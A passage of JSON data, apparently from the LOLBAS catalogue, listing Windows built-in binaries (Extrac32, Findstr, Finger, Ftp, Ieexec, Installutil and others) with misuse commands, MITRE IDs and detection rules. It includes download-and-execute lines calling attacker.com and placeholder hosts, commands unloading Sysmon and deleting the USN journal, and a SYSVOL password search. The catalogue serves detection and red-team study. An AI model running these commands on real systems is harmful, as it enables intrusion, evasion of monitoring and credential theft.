suspicious."}],"Resources":[{"Link":"https://twitter.com/CyberRaiju/status/1273597319322058752?s=20"},{"Link":"https://twitter.com/bohops/status/1276356245541335048"},{"Link":"https://twitter.com/bohops/status/986984122563391488"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Explorer/"},{"Name":"Extexport.exe","Description":"Load a DLL located in the c:\\test folder with a specific name.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Extexport.exe c:\\test foo bar","Description":"Load a DLL located in the c:\\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll","Usecase":"Execute dll file","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Program Files\\Internet Explorer\\Extexport.exe"},{"Path":"C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml"},{"IOC":"Extexport.exe loads dll and is execute from other folder the original path"}],"Resources":[{"Link":"http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Extexport/"},{"Name":"Extrac32.exe","Description":"Extract to ADS, copy or overwrite a file with Extrac32.exe","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"extrac32 C:\\ADS\\procexp.cab c:\\ADS\\file.txt:procexp.exe","Description":"Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.","Usecase":"Extract data from cab file and hide it in an alternate data stream.","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"extrac32 \\\\webdavserver\\webdav\\file.cab c:\\ADS\\file.txt:file.exe","Description":"Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.","Usecase":"Extract data from cab file and hide it in an alternate data stream.","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"extrac32 /Y /C \\\\webdavserver\\share\\test.txt C:\\folder\\test.txt","Description":"Copy the source file to the destination file and overwrite it.","Usecase":"Download file from UNC/WEBDav","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"extrac32.exe /C C:\\Windows\\System32\\calc.exe C:\\Users\\user\\Desktop\\calc.exe","Description":"Command for copying calc.exe to another folder","Usecase":"Copy file","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\extrac32.exe"},{"Path":"C:\\Windows\\SysWOW64\\extrac32.exe"}],"Detection":[{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"Resources":[{"Link":"https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"},{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"},{"Link":"https://twitter.com/egre55/status/985994639202283520"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"},{"Name":"Findstr.exe","Description":"Write to ADS, discover, or download files with Findstr.exe","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"findstr /V /L W3AllLov3LolBas c:\\ADS\\file.exe > c:\\ADS\\file.txt:file.exe","Description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.","Usecase":"Add a file to an alternate data stream to hide from defensive counter measures","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"findstr /V /L W3AllLov3LolBas \\\\webdavserver\\folder\\file.exe > c:\\ADS\\file.txt:file.exe","Description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.","Usecase":"Add a file to an alternate data stream from a webdav server to hide from defensive counter measures","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"findstr /S /I cpassword \\\\sysvol\\policies\\*.xml","Description":"Search for stored password in Group Policy files stored on SYSVOL.","Usecase":"Find credentials stored in cpassword attrbute","Category":"Credentials","Privileges":"User","MitreID":"T1552.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"findstr /V /L W3AllLov3LolBas \\\\webdavserver\\folder\\file.exe > c:\\ADS\\file.exe","Description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.","Usecase":"Download/Copy file from webdav server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\findstr.exe"},{"Path":"C:\\Windows\\SysWOW64\\findstr.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"Resources":[{"Link":"https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"},{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Findstr/"},{"Name":"Finger.exe","Description":"Displays information about a user or users on a specified remote computer that is running the Finger service or daemon","Author":"Ruben Revuelta","Created":"2021-08-30","Commands":[{"Command":"finger user@example.host.com | more +2 | cmd","Description":"Downloads payload from remote Finger server. This example connects to \"example.host.com\" asking for user \"user\"; the result could contain malicious shellcode which is executed by the cmd process.","Usecase":"Download malicious payload","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022"}],"Full_Path":[{"Path":"c:\\windows\\system32\\finger.exe"},{"Path":"c:\\windows\\syswow64\\finger.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml"},{"IOC":"finger.exe should not be run on a normal workstation."},{"IOC":"finger.exe connecting to external resources."}],"Resources":[{"Link":"https://twitter.com/DissectMalware/status/997340270273409024"},{"Link":"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Finger/"},{"Name":"fltMC.exe","Description":"Filter Manager Control Program used by Windows","Author":"John Lambert","Created":"2021-09-18","Commands":[{"Command":"fltMC.exe unload SysmonDrv","Description":"Unloads a driver used by security agents","Usecase":"Defense evasion","Category":"Tamper","Privileges":"Admin","MitreID":"T1562.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\fltMC.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml"},{"IOC":"4688 events with fltMC.exe"}],"Resources":[{"Link":"https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/FltMC/"},{"Name":"Forfiles.exe","Description":"Selects and executes a command on a file or set of files. This command is useful for batch processing.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","Description":"Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.","Usecase":"Use forfiles to start a new process to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"c:\\folder\\normal.dll:evil.exe\"","Description":"Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.","Usecase":"Use forfiles to start a new process from a binary hidden in an alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\forfiles.exe"},{"Path":"C:\\Windows\\SysWOW64\\forfiles.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"Resources":[{"Link":"https://twitter.com/vector_sec/status/896049052642533376"},{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"},{"Link":"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"},{"Name":"Fsutil.exe","Description":"File System Utility","Author":"Elliot Killick","Created":"2021-08-16","Commands":[{"Command":"fsutil.exe file setZeroData offset=0 length=9999999999 C:\\Windows\\Temp\\payload.dll","Description":"Zero out a file","Usecase":"Can be used to forensically erase a file","Category":"Tamper","Privileges":"User","MitreID":"T1485","OperatingSystem":"Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10"},{"Command":"fsutil.exe usn deletejournal /d c:","Description":"Delete the USN journal volume to hide file creation activity","Usecase":"Can be used to hide file creation activity","Category":"Tamper","Privileges":"User","MitreID":"T1485","OperatingSystem":"Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10"},{"Command":"fsutil.exe trace decode","Description":"Executes a pre-planted binary named netsh.exe from the current directory.","Usecase":"Spawn a pre-planted executable from fsutil.exe.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\fsutil.exe"},{"Path":"C:\\Windows\\SysWOW64\\fsutil.exe"}],"Detection":[{"IOC":"fsutil.exe should not be run on a normal workstation"},{"IOC":"file setZeroData (not case-sensitive) in the process arguments"},{"IOC":"Sysmon Event ID 1"},{"IOC":"Execution of process fsutil.exe with trace decode could be suspicious"},{"IOC":"Non-Windows netsh.exe execution"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1720724516324704404"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"},{"Name":"Ftp.exe","Description":"A binary designed for connecting to FTP servers","Author":"Oddvar Moe","Created":"2018-12-10","Commands":[{"Command":"echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt","Description":"Executes the commands you put inside the text file.","Usecase":"Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"cmd.exe /c \"@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v\"","Description":"Download","Usecase":"Spawn new process using ftp.exe. Ftp.exe downloads the binary.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\ftp.exe"},{"Path":"C:\\Windows\\SysWOW64\\ftp.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"IOC":"cmd /c as child process of ftp.exe"}],"Resources":[{"Link":"https://twitter.com/0xAmit/status/1070063130636640256"},{"Link":"https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939"},{"Link":"https://ss64.com/nt/ftp.html"},{"Link":"https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ftp/"},{"Name":"Gpscript.exe","Description":"Used by group policy to process scripts","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Gpscript /logon","Description":"Executes logon scripts configured in Group Policy.","Usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"Gpscript /startup","Description":"Executes startup scripts configured in Group Policy","Usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\gpscript.exe"},{"Path":"C:\\Windows\\SysWOW64\\gpscript.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"IOC":"Scripts added in local group policy"},{"IOC":"Execution of Gpscript.exe after logon"}],"Resources":[{"Link":"https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"},{"Name":"Hh.exe","Description":"Binary used for processing chm files in Windows","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"HH.exe http://some.url/script.ps1","Description":"Open the target PowerShell script with HTML Help.","Usecase":"Download files from url","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"HH.exe c:\\windows\\system32\\calc.exe","Description":"Executes calc.exe with HTML Help.","Usecase":"Execute process with HH.exe","Category":"Execute","Privileges":"User","MitreID":"T1218.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\hh.exe"},{"Path":"C:\\Windows\\SysWOW64\\hh.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"Resources":[{"Link":"https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Hh/"},{"Name":"IMEWDBLD.exe","Description":"Microsoft IME Open Extended Dictionary Module","Author":"Wade Hickey","Created":"2020-03-05","Commands":[{"Command":"C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw","Description":"IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.","Usecase":"Download file from Internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml"}],"Resources":[{"Link":"https://twitter.com/notwhickey/status/1367493406835040265"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"},{"Name":"Ie4uinit.exe","Description":"Executes commands from a specially prepared ie4uinit.inf file.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"ie4uinit.exe -BaseSettings","Description":"Executes commands from a specially prepared ie4uinit.inf file.","Usecase":"Get code execution by copy files to another location","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\ie4uinit.exe"},{"Path":"c:\\windows\\sysWOW64\\ie4uinit.exe"},{"Path":"c:\\windows\\system32\\ieuinit.inf"},{"Path":"c:\\windows\\sysWOW64\\ieuinit.inf"}],"Detection":[{"IOC":"ie4uinit.exe copied outside of %windir%"},{"IOC":"ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"}],"Resources":[{"Link":"https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"},{"Name":"iediagcmd.exe","Description":"Diagnostics Utility for Internet Explorer","Author":"manasmbellani","Created":"2022-03-29","Commands":[{"Command":"set windir=c:\\test& cd \"C:\\Program Files\\Internet Explorer\\\" & iediagcmd.exe /out:c:\\test\\foo.cab","Description":"Executes binary that is pre-planted at C:\\test\\system32\\netsh.exe.","Usecase":"Spawn a pre-planted executable from iediagcmd.exe.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\Internet Explorer\\iediagcmd.exe"}],"Detection":[{"Sigma":"https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml"},{"IOC":"Sysmon Event ID 1"},{"IOC":"Execution of process iediagcmd.exe with /out could be suspicious"}],"Resources":[{"Link":"https://twitter.com/Hexacorn/status/1507516393859731456"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/"},{"Name":"Ieexec.exe","Description":"The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"ieexec.exe http://x.x.x.x:8080/bypass.exe","Description":"Downloads and executes bypass.exe from the remote server.","Usecase":"Download and run attacker code from remote location","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"},{"Command":"ieexec.exe http://x.x.x.x:8080/bypass.exe","Description":"Downloads and executes bypass.exe from the remote server.","Usecase":"Download and run attacker code from remote location","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"IOC":"Network connections originating from ieexec.exe may be suspicious"}],"Resources":[{"Link":"https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"},{"Name":"Ilasm.exe","Description":"used for compile c# code into dll or exe.","Author":"Hai vaknin (lux)","Created":"2020-03-17","Commands":[{"Command":"ilasm.exe C:\\public\\test.txt /exe","Description":"Binary file used by .NET to compile C#/intermediate (IL) code to .exe","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 7, Windows 10, Windows 11"},{"Command":"ilasm.exe C:\\public\\test.txt /dll","Description":"Binary file used by .NET to compile C#/intermediate (IL) code to dll","Usecase":"A description of the usecase","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 7, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"}],"Detection":[{"IOC":"Ilasm may not be used often in production environments (such as on endpoints)"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"Resources":[{"Link":"https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"},{"Name":"Infdefaultinstall.exe","Description":"Binary used to perform installation based on content inside inf files","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"InfDefaultInstall.exe Infdefaultinstall.inf","Description":"Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.","Usecase":"Code execution","Category":"Execute","Privileges":"Admin","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Infdefaultinstall.exe"},{"Path":"C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"Resources":[{"Link":"https://twitter.com/KyleHanslovan/status/911997635455852544"},{"Link":"https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/"},{"Link":"https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"},{"Name":"Installutil.exe","Description":"The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Description":"Execute the target .NET DLL or EXE.","Usecase":"Use to execute code and bypass application whitelisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]},{"Command":"InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Description":"Execute the target .NET DLL or EXE.","Usecase":"Use to execute code and bypass application whitelisting","Category":"Execute","Privileges":"User","MitreID":"T1218.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]},{"Command":"InstallUtil.exe https://example.com/payload","Description":"It will download a remote payload and place it in INetCache.","Usecase":"Downloads payload from remote server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"Resources":[{"Link":"https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/"},{"Link":"https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12"},{"Link":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"Link":"https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/"},{"Link":"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/"},{"Link":"https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Installutil/"},{"Name":"Jsc.exe","Description":"Binary file used by .NET to compile JavaScript code to .exe or .dll format","Author":"Oddvar Moe","Created":"2019-05-31","Commands":[{"Command":"jsc.exe scriptfile.js","Description":"Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]},{"Command":"jsc.exe /t:library Library.js","Description":"Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"IOC":"Jsc.exe should normally not run a system unless it is used for 